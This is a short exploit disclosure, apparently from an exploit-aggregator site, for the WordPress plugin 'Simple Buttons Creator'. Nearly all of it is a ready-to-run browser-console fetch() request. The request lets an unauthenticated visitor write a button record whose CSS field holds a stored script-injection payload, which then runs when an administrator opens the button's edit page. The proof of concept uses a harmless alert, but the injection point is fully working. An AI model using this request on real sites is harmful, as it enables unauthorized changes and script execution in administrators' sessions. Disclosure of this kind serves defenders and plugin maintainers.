Share
## https://sploitus.com/exploit?id=WPEX-ID:B7A35C5B-474A-444A-85EE-C50782C7A6C2
As a non-logged in visitor, run the following in the browser console (replace `<<ANY_ID>>` with any number):

```
fetch("/wp-content/plugins/simple-buttons-creator/bt-manage.php?page=sbc-new&method=post", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
 "body": 'button_id=<<ANY_ID>>&bt_name=CSRF909&bt_text=CSRF&bt_link=CSRF&bt_bg_color=CSRF&bt_txt_color=CSRF&bt_font_size=&bt_border_radius=&bt_css=</textarea><script>alert(2)</script>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

As an admin, go to:

https://example.com/wp-admin/admin.php?page=simple-buttons&method=edit&id=<<ANY_ID>>

and see the XSS.